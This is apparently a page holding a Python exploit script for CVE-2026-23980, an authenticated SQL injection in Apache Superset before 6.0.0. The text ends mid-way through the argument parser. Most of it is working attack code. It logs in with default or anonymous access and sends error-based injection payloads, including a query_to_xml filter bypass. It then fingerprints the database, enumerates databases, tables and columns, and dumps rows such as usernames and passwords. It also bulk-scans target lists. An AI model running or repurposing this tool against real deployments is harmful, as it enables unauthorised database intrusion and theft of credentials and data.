5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-23980 -- Apache Superset Authenticated Error-Based SQL Injection
=========================================================================
Apache Superset < 6.0.0 allows authenticated users with read access to
perform error-based SQL injection via the 'sqlExpression' or 'where'
parameters in the /api/v1/chart/data endpoint.

Kill chain:
  POST /api/v1/chart/data
  -> ChartDataRestApi.data() -> QueryContext.get_df_payload()
  -> SqlaTable.get_sqla_query() -> adhoc column sqlExpression
  -> validate_adhoc_subquery() BYPASSED via query_to_xml()
  -> raw SQL hits the database -> data extraction

For AUTHORIZED SECURITY RESEARCH ONLY.
CVSS 6.5 | CWE-89 | Fixed in Apache Superset 6.0.0
"""

from __future__ import annotations

import argparse
import json
import sys
import textwrap
import time
import random
import re
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed

try:
    import requests
    from requests.exceptions import ConnectionError, Timeout
except ImportError:
    print("[!] 'requests' library required: pip install requests")
    sys.exit(1)

# -- Globals -----------------------------------------------------------------

VERBOSITY = 1


# -- ANSI --------------------------------------------------------------------

class C:
    RED     = "\033[91m"
    GREEN   = "\033[92m"
    YELLOW  = "\033[93m"
    CYAN    = "\033[96m"
    MAGENTA = "\033[95m"
    WHITE   = "\033[97m"
    GRAY    = "\033[90m"
    BOLD    = "\033[1m"
    DIM     = "\033[2m"
    BLINK   = "\033[5m"
    RESET   = "\033[0m"


# -- Output helpers ----------------------------------------------------------

_glitch_chars = list("\u2591\u2592\u2593\u2588\u2580\u2584\u258c\u2590")
_print_lock = threading.Lock()

def _glitch(n: int = 12) -> str:
    return "".join(random.choice(_glitch_chars) for _ in range(n))

def _typewriter(text: str, speed: float = 0.02):
    for ch in text:
        sys.stdout.write(ch)
        sys.stdout.flush()
        time.sleep(speed)
    print()

def info(msg):
    if VERBOSITY >= 1:
        print(f"  {C.CYAN}[*]{C.RESET} {msg}")

def good(msg):
    print(f"  {C.GREEN}[+]{C.RESET} {msg}")

def warn(msg):
    print(f"  {C.YELLOW}[!]{C.RESET} {msg}")

def fail(msg):
    print(f"  {C.RED}{C.BOLD}[-]{C.RESET} {msg}")

def creepy(msg):
    if VERBOSITY >= 1:
        print(f"  {C.MAGENTA}[~]{C.RESET} {C.MAGENTA}{msg}{C.RESET}")

def debug(msg):
    if VERBOSITY >= 2:
        print(f"  {C.GRAY}[DEBUG]{C.RESET} {C.DIM}{msg}{C.RESET}")

def print_table(headers: list[str], rows: list[list[str]], title: str = ""):
    """Print a sqlmap-style ASCII table."""
    if not rows:
        return
    col_widths = [len(h) for h in headers]
    for row in rows:
        for i, cell in enumerate(row):
            if i < len(col_widths):
                col_widths[i] = max(col_widths[i], len(str(cell)))

    sep = "+-" + "-+-".join("-" * w for w in col_widths) + "-+"
    hdr = "| " + " | ".join(h.ljust(w) for h, w in zip(headers, col_widths)) + " |"

    if title:
        print(f"\n  {C.WHITE}{C.BOLD}{title}{C.RESET}")
    print(f"  {sep}")
    print(f"  {C.BOLD}{hdr}{C.RESET}")
    print(f"  {sep}")
    for row in rows:
        cells = []
        for i, w in enumerate(col_widths):
            val = str(row[i]) if i < len(row) else ""
            cells.append(val.ljust(w))
        print(f"  | {' | '.join(cells)} |")
    print(f"  {sep}")
    print(f"  {C.DIM}[{len(rows)} row(s)]{C.RESET}")


# -- Session management ------------------------------------------------------

def login(base_url: str, username: str, password: str,
          timeout: int = 15) -> requests.Session | None:
    session = requests.Session()
    try:
        r = session.post(
            f"{base_url}/api/v1/security/login",
            json={"username": username, "password": password,
                  "provider": "db", "refresh": True},
            timeout=timeout,
        )
        if r.status_code != 200:
            fail(f"login failed: HTTP {r.status_code}")
            return None
        token = r.json().get("access_token")
        if not token:
            fail("no access_token in response")
            return None
        session.headers.update({"Authorization": f"Bearer {token}"})
    except Exception as e:
        fail(f"login error: {e}")
        return None

    try:
        r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
        if r.status_code == 200:
            csrf = r.json().get("result")
            if csrf:
                session.headers.update({"X-CSRFToken": csrf})
    except Exception:
        pass

    return session


def try_anonymous(base_url: str, timeout: int = 15) -> requests.Session | None:
    """Try to access Superset without authentication.

    Works when PUBLIC_ROLE_LIKE is set (e.g. "Gamma"), giving anonymous
    users read access to datasets and the chart/data endpoint.

    Also tries to grab a CSRF token from the login page cookies, which
    some Superset configs expose to anonymous users.
    """
    session = requests.Session()

    # Step 1: Hit the main page to pick up any session cookies
    try:
        r = session.get(base_url, timeout=timeout)
    except Exception:
        pass

    # Step 2: Try to get a CSRF token (some configs expose this anonymously)
    try:
        r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
        if r.status_code == 200:
            csrf = r.json().get("result")
            if csrf:
                session.headers.update({"X-CSRFToken": csrf})
                debug(f"got anonymous CSRF token")
    except Exception:
        pass

    # Step 3: Test if we can actually hit the chart/data endpoint
    # Try a minimal request to see if we get 401/403 or something else
    test_body = {
        "datasource": {"id": 1, "type": "table"},
        "queries": [{
            "columns": [{"label": "test", "sqlExpression": "1",
                         "expressionType": "SQL"}],
            "metrics": [], "filters": [],
            "extras": {"having": "", "where": ""},
            "row_limit": 1, "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }

    try:
        r = session.post(f"{base_url}/api/v1/chart/data",
                         json=test_body, timeout=timeout)
        if r.status_code in (200, 400, 422, 500):
            # Got past auth — public role is active
            return session
        elif r.status_code in (401, 403):
            return None
    except Exception:
        pass

    return None




def check_version(base_url: str, timeout: int = 10) -> str | None:
    for endpoint in ["/api/v1/version", "/health"]:
        try:
            r = requests.get(f"{base_url}{endpoint}", timeout=timeout)
            if r.status_code == 200:
                data = r.json()
                v = data.get("result", {}).get("version") or data.get("version")
                if v:
                    return v
        except Exception:
            pass
    return None


def is_vulnerable(version: str) -> bool:
    try:
        parts = [int(x) for x in version.strip().split(".")[:3]]
        return parts[0] < 6
    except ValueError:
        return False


def enumerate_datasources(base_url: str, session: requests.Session,
                          timeout: int = 15) -> list[dict]:
    datasources = []
    try:
        r = session.get(f"{base_url}/api/v1/dataset/",
                        params={"q": "(page_size:50)"}, timeout=timeout)
        if r.status_code == 200:
            for ds in r.json().get("result", []):
                datasources.append({
                    "id": ds.get("id"),
                    "name": ds.get("table_name") or ds.get("datasource_name"),
                    "schema": ds.get("schema"),
                    "database": ds.get("database", {}).get("database_name", "?"),
                    "type": ds.get("datasource_type", "table"),
                })
    except Exception:
        pass
    return datasources


# -- SQL Injection core -------------------------------------------------------

def build_chart_data_payload(datasource_id: int, datasource_type: str = "table",
                             injection_point: str = "sqlExpression",
                             sqli_payload: str = "1") -> dict:
    if injection_point == "sqlExpression":
        return {
            "datasource": {"id": datasource_id, "type": datasource_type},
            "queries": [{
                "columns": [{
                    "label": "injected",
                    "sqlExpression": sqli_payload,
                    "expressionType": "SQL",
                }],
                "metrics": [], "filters": [],
                "extras": {"having": "", "where": ""},
                "row_limit": 1000, "order_desc": True,
                "time_range": "No filter",
            }],
            "result_format": "json", "result_type": "full",
        }
    else:
        return {
            "datasource": {"id": datasource_id, "type": datasource_type},
            "queries": [{
                "columns": [],
                "metrics": [{"label": "cnt", "expressionType": "SQL",
                             "sqlExpression": "COUNT(*)"}],
                "filters": [],
                "extras": {"having": "", "where": sqli_payload},
                "row_limit": 1, "order_desc": True,
                "time_range": "No filter",
            }],
            "result_format": "json", "result_type": "full",
        }


def send_sqli(base_url: str, session: requests.Session, datasource_id: int,
              sqli_payload: str, injection_point: str = "sqlExpression",
              datasource_type: str = "table",
              timeout: int = 30) -> tuple[int, str]:
    body = build_chart_data_payload(datasource_id, datasource_type,
                                    injection_point, sqli_payload)
    debug(f"SQL payload: {sqli_payload}")
    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if VERBOSITY >= 3:
            debug(f"HTTP {r.status_code}: {r.text[:300]}")
        return r.status_code, r.text
    except Exception as e:
        return 0, str(e)


def extract_from_direct(response_text: str) -> list[dict] | None:
    """Parse all rows from a successful JSON response."""
    try:
        data = json.loads(response_text)
        results = data.get("result", [])
        if results and results[0].get("data"):
            return results[0]["data"]
    except Exception:
        pass
    return None


def extract_single_from_direct(response_text: str) -> str | None:
    """Extract a single value from direct response."""
    rows = extract_from_direct(response_text)
    if rows:
        row = rows[0]
        val = row.get("injected")
        if val is not None:
            return str(val)
    return None


def extract_from_error(response_text: str) -> str | None:
    patterns = [
        r'invalid input syntax for (?:type )?integer: "([^"]*)"',
        r'"message":\s*".*?invalid input syntax.*?\\"([^\\]*)\\"',
    ]
    for pat in patterns:
        m = re.search(pat, response_text)
        if m:
            return m.group(1)
    return None


def sqli_extract_string(sql_expr: str) -> str:
    return f"CAST(({sql_expr}) AS INT)"


def sqli_xml_bypass(sql_query: str) -> str:
    return f"query_to_xml('{sql_query}', true, false, '')"


def extract_value(base_url, session, ds_id, sql, inj_point="sqlExpression",
                  xml_bypass=False, timeout=30) -> str | None:
    """Extract a single value. Tries direct, then error-based."""
    # Direct
    if inj_point == "sqlExpression":
        status, text = send_sqli(base_url, session, ds_id, f"({sql})",
                                 injection_point=inj_point, timeout=timeout)
        result = extract_single_from_direct(text)
        if result:
            return result

    # Error-based
    if xml_bypass:
        inner = sqli_xml_bypass(sql.replace("'", "''"))
        payload = f"CAST(({inner})::text AS INT)"
    else:
        payload = sqli_extract_string(sql)

    if inj_point == "where":
        payload = f"1=1 AND {payload} > 0"

    status, text = send_sqli(base_url, session, ds_id, payload,
                             injection_point=inj_point, timeout=timeout)
    return extract_from_error(text)


def extract_rows(base_url, session, ds_id, sql, inj_point="sqlExpression",
                 xml_bypass=False, timeout=30,
                 start=0, stop=100) -> list[str]:
    """Extract multiple rows using LIMIT/OFFSET."""
    results = []
    base_sql = re.sub(r'\s+LIMIT\s+\d+', '', sql, flags=re.I)
    base_sql = re.sub(r'\s+OFFSET\s+\d+', '', base_sql, flags=re.I)

    for offset in range(start, stop):
        query = f"{base_sql} LIMIT 1 OFFSET {offset}"
        val = extract_value(base_url, session, ds_id, query,
                            inj_point=inj_point, xml_bypass=xml_bypass,
                            timeout=timeout)
        if val is None:
            break
        results.append(val)
        if VERBOSITY >= 1:
            sys.stdout.write(f"\r  {C.CYAN}[*]{C.RESET} extracting... "
                             f"{C.BOLD}{len(results)}{C.RESET} row(s)")
            sys.stdout.flush()
    if results and VERBOSITY >= 1:
        print()
    return results


def extract_multi_column_direct(base_url, session, ds_id, columns: list[str],
                                inj_point="sqlExpression", timeout=30,
                                start=0, stop=20) -> list[list[str]]:
    """Extract multi-column data using direct sqlExpression reads.

    Instead of SELECT col FROM table (blocked by subquery filter),
    we inject the column name directly as the sqlExpression. This reads
    from the datasource's underlying table without a FROM clause.
    We use row_limit and offset via multiple requests.
    """
    # Build payload with all columns at once
    body = {
        "datasource": {"id": ds_id, "type": "table"},
        "queries": [{
            "columns": [
                {"label": col, "sqlExpression": col, "expressionType": "SQL"}
                for col in columns
            ],
            "metrics": [], "filters": [],
            "extras": {"having": "", "where": ""},
            "row_limit": stop - start,
            "row_offset": start,
            "order_desc": False,
            "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }

    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if r.status_code == 200:
            data = r.json().get("result", [{}])[0].get("data", [])
            rows = []
            for row in data:
                rows.append([str(row.get(col, "NULL")) for col in columns])
            return rows
    except Exception:
        pass
    return []


def extract_multi_column_rows(base_url, session, ds_id, columns: list[str],
                              table: str, inj_point="sqlExpression",
                              xml_bypass=False, timeout=30,
                              start=0, stop=20, where="") -> list[list[str]]:
    """Extract multiple columns per row. Tries direct read first, then subquery."""

    # Strategy 1: Direct column read (works when ds_id matches the table)
    if inj_point == "sqlExpression" and not xml_bypass:
        rows = extract_multi_column_direct(base_url, session, ds_id, columns,
                                           inj_point=inj_point, timeout=timeout,
                                           start=start, stop=stop)
        if rows:
            if VERBOSITY >= 1:
                print(f"  {C.CYAN}[*]{C.RESET} extracted {C.BOLD}{len(rows)}{C.RESET} row(s) via direct read")
            return rows

    # Strategy 2: Subquery per column (works with xml_bypass on PostgreSQL)
    rows = []
    where_clause = f" WHERE {where}" if where else ""

    for offset in range(start, stop):
        row_data = []
        empty = True
        for col in columns:
            sql = f"SELECT {col} FROM {table}{where_clause} LIMIT 1 OFFSET {offset}"
            val = extract_value(base_url, session, ds_id, sql,
                                inj_point=inj_point, xml_bypass=xml_bypass,
                                timeout=timeout)
            if val is not None:
                empty = False
            row_data.append(val or "NULL")
        if empty:
            break
        rows.append(row_data)
        if VERBOSITY >= 1:
            sys.stdout.write(f"\r  {C.CYAN}[*]{C.RESET} dumping... "
                             f"{C.BOLD}{len(rows)}{C.RESET} row(s)")
            sys.stdout.flush()
    if rows and VERBOSITY >= 1:
        print()
    return rows


# -- DB Fingerprinting -------------------------------------------------------

def fingerprint_db(base_url, session, ds_id, inj_point="sqlExpression",
                   timeout=30) -> str:
    """Detect backend database type. Returns 'sqlite', 'postgresql', or 'unknown'."""
    info("fingerprinting backend database...")

    # Try SQLite — sqlite_version() is a scalar function (no FROM)
    status, text = send_sqli(base_url, session, ds_id, "(SELECT sqlite_version())",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val and re.match(r'\d+\.\d+', val):
        good(f"backend: {C.BOLD}SQLite {val}{C.RESET}")
        return "sqlite"

    # Try PostgreSQL — current_setting() is a scalar function (no FROM)
    status, text = send_sqli(base_url, session, ds_id,
                             "(SELECT current_setting('server_version'))",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val and re.match(r'\d+\.\d+', val):
        good(f"backend: {C.BOLD}PostgreSQL {val}{C.RESET}")
        return "postgresql"

    # Try MySQL — @@version is a system variable (no FROM)
    status, text = send_sqli(base_url, session, ds_id, "(SELECT @@version)",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val:
        good(f"backend: {C.BOLD}MySQL {val}{C.RESET}")
        return "mysql"

    warn("could not fingerprint backend database")
    return "unknown"


# -- Enumeration functions (sqlmap-style) ------------------------------------

def enum_banner(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching banner...")
    queries = {
        "sqlite": "SELECT sqlite_version()",
        "postgresql": "SELECT current_setting('server_version')",
        "mysql": "SELECT @@version",
        "unknown": "SELECT sqlite_version()",
    }
    val = extract_value(base_url, session, ds_id, queries.get(db_type, queries["unknown"]),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"banner: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch banner")


def enum_current_user(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching current user...")
    queries = {
        "sqlite": "SELECT 'sqlite_user'",
        "postgresql": "SELECT current_user",
        "mysql": "SELECT user()",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT current_user"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"current user: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch current user")


def enum_current_db(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching current database...")
    queries = {
        "sqlite": "SELECT 'main'",
        "postgresql": "SELECT current_database()",
        "mysql": "SELECT database()",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT current_database()"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"current database: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch current database")


def enum_hostname(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching hostname...")
    queries = {
        "sqlite": "SELECT 'N/A (SQLite)'",
        "postgresql": "SELECT inet_server_addr()",
        "mysql": "SELECT @@hostname",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT 'unknown'"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"hostname: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch hostname")


def enum_dbs(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("enumerating databases...")
    queries = {
        "sqlite": "SELECT name FROM pragma_database_list",
        "postgresql": "SELECT datname FROM pg_database WHERE datistemplate = false",
        "mysql": "SELECT schema_name FROM information_schema.schemata",
    }
    sql = queries.get(db_type, queries["postgresql"])
    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"available databases [{len(rows)}]:")
        print_table(["database"], [[r] for r in rows])
    else:
        # Fallback: list databases from Superset API
        warn("subquery blocked -- listing databases from Superset API")
        try:
            r = session.get(f"{base_url.rstrip('/')}/api/v1/database/", timeout=timeout)
            if r.status_code == 200:
                dbs = r.json().get("result", [])
                if dbs:
                    db_names = [d.get("database_name", "?") for d in dbs]
                    good(f"available databases [{len(db_names)}] (via API):")
                    print_table(["database"], [[n] for n in db_names])
                    return
        except Exception:
            pass
        fail("could not enumerate databases")


def enum_tables(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                target_db=None, datasources=None):
    db_label = target_db or "current"
    info(f"enumerating tables in '{db_label}'...")

    if db_type == "sqlite":
        sql = "SELECT name FROM sqlite_master WHERE type='table'"
    elif db_type == "postgresql":
        schema = target_db or "public"
        sql = (f"SELECT table_name FROM information_schema.tables "
               f"WHERE table_schema='{schema}'")
    elif db_type == "mysql":
        if target_db:
            sql = (f"SELECT table_name FROM information_schema.tables "
                   f"WHERE table_schema='{target_db}'")
        else:
            sql = ("SELECT table_name FROM information_schema.tables "
                   "WHERE table_schema=database()")
    else:
        sql = "SELECT name FROM sqlite_master WHERE type='table'"

    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"tables in '{db_label}' [{len(rows)}]:")
        print_table(["table_name"], [[r] for r in rows])
    else:
        # Fallback: if subquery blocked, list known datasources as tables
        if datasources:
            warn("subquery filter blocked FROM clause -- listing known datasources instead")
            warn("use --xml-bypass on PostgreSQL to bypass this filter")
            rows = [ds["name"] for ds in datasources if ds["name"]]
            if rows:
                good(f"known datasource tables [{len(rows)}]:")
                print_table(["table_name"], [[r] for r in rows])
        else:
            fail("could not enumerate tables (subquery filter active)")
            warn("try --xml-bypass on PostgreSQL targets")
    return rows


def enum_columns_via_api(base_url, session, target_table, datasources, timeout=15):
    """Fallback: get columns from the Superset dataset API."""
    # Find the dataset ID for this table
    ds_match = None
    for ds in (datasources or []):
        if ds.get("name") == target_table:
            ds_match = ds
            break
    if not ds_match:
        return []

    try:
        r = session.get(f"{base_url}/api/v1/dataset/{ds_match['id']}",
                        timeout=timeout)
        if r.status_code == 200:
            cols = r.json().get("result", {}).get("columns", [])
            return [c.get("column_name") or c.get("name", "?") for c in cols]
    except Exception:
        pass
    return []


def enum_columns(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                 target_table, target_db=None, datasources=None):
    info(f"enumerating columns in '{target_table}'...")

    if db_type == "sqlite":
        sql = f"SELECT name FROM pragma_table_info('{target_table}')"
    elif db_type == "postgresql":
        schema = target_db or "public"
        sql = (f"SELECT column_name FROM information_schema.columns "
               f"WHERE table_schema='{schema}' AND table_name='{target_table}'")
    elif db_type == "mysql":
        if target_db:
            sql = (f"SELECT column_name FROM information_schema.columns "
                   f"WHERE table_schema='{target_db}' AND table_name='{target_table}'")
        else:
            sql = (f"SELECT column_name FROM information_schema.columns "
                   f"WHERE table_schema=database() AND table_name='{target_table}'")
    else:
        sql = f"SELECT name FROM pragma_table_info('{target_table}')"

    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"columns in '{target_table}' [{len(rows)}]:")
        print_table(["column_name"], [[r] for r in rows])
    else:
        # Fallback: get columns from Superset API
        warn("subquery blocked -- falling back to Superset dataset API")
        api_cols = enum_columns_via_api(base_url, session, target_table,
                                         datasources, timeout)
        if api_cols:
            rows = api_cols
            good(f"columns in '{target_table}' [{len(rows)}] (via API):")
            print_table(["column_name"], [[r] for r in rows])
        else:
            fail(f"could not enumerate columns for '{target_table}'")
    return rows


def enum_count(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
               target_table, target_db=None):
    info(f"counting rows in '{target_table}'...")
    # COUNT(*) must be sent as a metric, not a column
    body = {
        "datasource": {"id": ds_id, "type": "table"},
        "queries": [{
            "columns": [],
            "metrics": [{"label": "cnt", "expressionType": "SQL",
                         "sqlExpression": "COUNT(*)"}],
            "filters": [], "extras": {"having": "", "where": ""},
            "row_limit": 1, "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }
    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if r.status_code == 200:
            data = r.json().get("result", [{}])[0].get("data", [])
            if data:
                cnt = data[0].get("cnt")
                if cnt is not None:
                    good(f"rows in '{target_table}': {C.BOLD}{cnt}{C.RESET}")
                    return
    except Exception:
        pass
    fail("could not count rows")


def enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
              target_table, target_columns=None, target_db=None,
              start=0, stop=20, datasources=None):
    if target_columns:
        columns = [c.strip() for c in target_columns.split(",")]
    else:
        # Auto-discover columns
        cols = enum_columns(base_url, session, ds_id, db_type, inj_point,
                            xml_bypass, timeout, target_table, target_db,
                            datasources=datasources)
        if not cols:
            fail("cannot dump without column names -- specify -C manually")
            return
        columns = cols[:10]

    info(f"dumping '{target_table}' [{', '.join(columns)}] rows {start}-{stop}...")

    rows = extract_multi_column_rows(
        base_url, session, ds_id, columns, target_table,
        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout,
        start=start, stop=stop,
    )

    if rows:
        good(f"dumped {len(rows)} row(s) from '{target_table}':")
        print_table(columns, rows, title=f"Table: {target_table}")
    else:
        fail(f"could not dump '{target_table}'")


def enum_dump_all(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                  target_db=None, start=0, stop=10, datasources=None):
    tables = enum_tables(base_url, session, ds_id, db_type, inj_point,
                         xml_bypass, timeout, target_db, datasources=datasources)
    if not tables:
        return

    for table_name in tables:
        print()
        enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass,
                  timeout, table_name, target_db=target_db,
                  start=start, stop=stop, datasources=datasources)


# -- Injection test ----------------------------------------------------------

def test_injectable(base_url, session, ds_id, timeout=30) -> str | None:
    for point in ("sqlExpression", "where"):
        if point == "sqlExpression":
            payload = "CAST('sqli_test_xyzzy' AS INT)"
        else:
            payload = "1=1 AND CAST('sqli_test_xyzzy' AS INT) > 0"
        status, text = send_sqli(base_url, session, ds_id, payload,
                                 injection_point=point, timeout=timeout)
        if "sqli_test_xyzzy" in text:
            return point
    return None


# -- Bulk scanner ------------------------------------------------------------

def _scan_single(target, timeout, results):
    target = target.strip().rstrip("/")
    if not target:
        return
    if not target.startswith("http"):
        target = f"http://{target}"

    entry = {"url": target, "status": "unknown", "version": None}
    try:
        version = check_version(target, timeout=timeout)
        if version:
            entry["version"] = version
            entry["status"] = "VULNERABLE" if is_vulnerable(version) else "patched"
        else:
            try:
                r = requests.get(target, timeout=timeout)
                entry["status"] = "up (version hidden)" if r.status_code < 500 else "error"
            except Exception:
                entry["status"] = "down"

        with _print_lock:
            if entry["status"] == "VULNERABLE":
                print(f"  {C.RED}[VULN]{C.RESET} {C.BOLD}{target}{C.RESET} -- {entry['version']}")
            elif entry["status"] == "patched":
                print(f"  {C.GREEN}[SAFE]{C.RESET} {target} -- {entry['version']}")
            else:
                print(f"  {C.GRAY}[----]{C.RESET} {target} -- {C.DIM}{entry['status']}{C.RESET}")
    except Exception:
        entry["status"] = "error"
    results[target] = entry


def run_bulk_scan(scan_file, threads=10, timeout=10, output_file=None):
    try:
        with open(scan_file) as f:
            targets = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
    except FileNotFoundError:
        fail(f"file not found: {scan_file}")
        sys.exit(1)

    print(f"\n  {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- {C.DIM}Bulk Scanner{C.RESET}")
    info(f"loaded {len(targets)} target(s)")
    print(f"  {C.DIM}{'=' * 50}{C.RESET}")

    results = {}
    start = time.time()
    with ThreadPoolExecutor(max_workers=threads) as pool:
        futures = {pool.submit(_scan_single, t, timeout, results): t for t in targets}
        for f in as_completed(futures):
            try: f.result()
            except Exception: pass

    elapsed = time.time() - start
    vuln = sum(1 for r in results.values() if r["status"] == "VULNERABLE")
    print(f"  {C.DIM}{'=' * 50}{C.RESET}")
    print(f"  {C.RED}{C.BOLD}{vuln}{C.RESET} vulnerable / {len(results)} scanned ({elapsed:.1f}s)\n")

    if output_file:
        with open(output_file, "w") as f:
            for r in results.values():
                f.write(f"{r['status']}\t{r['url']}\tv={r['version'] or '?'}\n")
        good(f"saved to {output_file}")


# -- Banner ------------------------------------------------------------------

_BLOODY_SKULL = [
    "             \033[91m\033[1m_,.-------.,_\033[0m",
    "         \033[91m\033[1m,;~'\033[0m\033[31m             \033[91m\033[1m'~;,\033[0m",
    "       \033[91m\033[1m,;\033[0m\033[31m                   \033[91m\033[1m;,\033[0m",
    "      \033[91m\033[1m;\033[0m\033[31m    \033[91m\033[1m_    ___    _\033[0m\033[31m    \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m'\033[0m\033[31m   \033[97m\033[1m/  \\ \033[0m\033[31m   \033[97m\033[1m/  \\ \033[0m\033[31m   \033[91m\033[1m'\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m  \033[97m\033[1m| () |\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m  \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m   \033[97m\033[1m\\__/ \033[0m\033[31m   \033[97m\033[1m\\__/ \033[0m\033[31m   \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m         \033[91m\033[1m/\\\033[0m\033[31m         \033[91m\033[1m;\033[0m",
    "      \033[91m\033[1m;\033[0m\033[31m    \033[91m\033[1m\\______/\033[0m\033[31m    \033[91m\033[1m;\033[0m",
    "       \033[91m\033[1m';\033[0m\033[31m  \033[91m\033[1m|\"\"\"\"\"\"|\033[0m\033[31m  \033[91m\033[1m;'\033[0m",
    "         \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m|      |\033[0m\033[31m \033[91m\033[1m;'\033[0m",
    "           \033[91m\033[1m'------'\033[0m",
]

def banner():
    print()
    for line in _BLOODY_SKULL:
        print(f"  {line}")
        time.sleep(0.04)

    print(f"""{C.RED}{C.BOLD}
  \u2554{'=' * 59}\u2557
  \u2551  {C.BLINK}CVE-2026-23980{C.RESET}{C.RED}{C.BOLD}  --  Apache Superset SQLi            \u2551
  \u2551  {C.RESET}{C.DIM}CVSS 6.5  |  CWE-89  |  Superset < 6.0.0{C.RESET}{C.RED}{C.BOLD}         \u2551
  \u255a{'=' * 59}\u255d{C.RESET}""")

    _typewriter(
        f"  {C.GRAY}// their queries bleed data. "
        f"sqlExpression was the wound.{C.RESET}",
        speed=0.015,
    )
    print()


# -- Main --------------------------------------------------------------------

def main():
    global VERBOSITY

    desc = f"""
  {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- Apache Superset Authenticated SQL Injection
  {C.DIM}sqlmap-style enumeration via sqlExpression / where injection{C.RESET}

  {C.GRAY}CVSS 6.5 | CWE-89 | Apache Superset < 6.0.0{C.RESET}

  {C.WHITE}{C.BOLD}KILL CHAIN:{C.RESET}
  {C.DIM}POST /api/v1/chart/data -> sqlExpression -> exec() on DB{C.RESET}
"""

    epilog = f"""
  {C.WHITE}{C.BOLD}EXAMPLES:{C.RESET}

  {C.CYAN}Recon:{C.RESET}
    %(prog)s -u http://target:8088 --check

  {C.CYAN}Enumerate:{C.RESET}
    %(prog)s -u http://target:8088 --banner --current-user --current-db
    %(prog)s -u http://target:8088 --dbs
    %(prog)s -u http://target:8088 --tables
    %(prog)s -u http://target:8088 --tables -D public
    %(prog)s -u http://target:8088 --columns -T users
    %(prog)s -u http://target:8088 --count -T users

  {C.CYAN}Dump:{C.RESET}
    %(prog)s -u http://target:8088 --dump -T users
    %(prog)s -u http://target:8088 --dump -T users -C "username,password" --start 0 --stop 50
    %(prog)s -u http://target:8088 --dump-all --stop 5

  {C.CYAN}Raw SQL:{C.RESET}
    %(prog)s -u http://target:8088 --sql "SELECT version()"

  {C.CYAN}No creds:{C.RESET}
    %(prog)s -u http://target:8088 --anonymous --banner --tables
  {C.CYAN}Bypass + Bulk:{C.RESET}
    %(prog)s -u http://target:8088 --tables --xml-bypass
    %(prog)s --scan-file targets.txt --threads 20

  {C.DIM}// authorized security research only.{C.RESET}
"""

    P = argparse.ArgumentParser(description=desc, epilog=epilog,
                                formatter_class=argparse.RawDescriptionHelpFormatter)

    g = P.add_argument_group(f"{C.RED}TARGET{C.RESET}",
                             f"{C.DIM}who forgot to parameterize today?{C.RESET}")
    g.add_argument("-u", "--url", help="Superset URL (http://target:8088)")
    g.add_argument("--user", default="admin", help="username (default: admin)")
    g.add_argument("--password", default="admin", help="password (default: admin)")
    g.add_argument("--anonymous", action="store_true",
                   help="skip login -- exploit via PUBLIC_ROLE (no creds needed)")
    g.add_argument("--ds-id", type=int, help="datasource/dataset ID")

    g = P.add_argument_group(f"{C.RED}ENUMERATE{C.RESET}",
                             f"{C.DIM}sqlmap-style automated extraction{C.RESET}")
    g.add_argument("--banner", action="store_true", help="DB version banner")
    g.add_argument("--current-user", action="store_true", help="current DB user")
